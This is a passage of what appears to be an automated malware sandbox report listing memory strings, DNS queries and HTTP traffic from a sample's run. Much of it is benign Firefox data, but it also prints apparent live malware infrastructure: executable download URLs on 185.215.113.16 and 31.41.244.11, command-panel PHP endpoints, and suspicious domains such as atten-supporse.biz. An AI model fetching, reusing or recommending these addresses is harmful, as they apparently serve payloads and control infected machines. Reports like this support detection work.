"*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ipc:first-content-process-createdresource://gre/modules/amManager.sys.mjssitepermsaddon-provider-registeredspeculativeConnectWithOriginAttributes@mozilla.org/spellchecker/engine;1@mozilla.org/network/file-output-stream;1https://smartblock.firefox.etp/play.svg@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1*://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.jsresource://gre/modules/FileUtils.sys.mjs*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://connect.facebook.net/*/all.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/sdk.js*pictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2925250004.000001DEF10F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: home.twentykx20pt.top
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001242000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2954316524.000000000113A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeI
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeze
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe7
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe:
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeC
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeo
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exeR
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206?
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeD
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique1/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1aa;
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe6%
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60N
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60ac02b4ded8abeee1fbdemp
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exed
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exeedQ
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exej
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB96A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2875741877.000001DEFABD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFf736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi
Source: firefox.exe, 0000001C.00000003.2822675345.000001DEF908F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
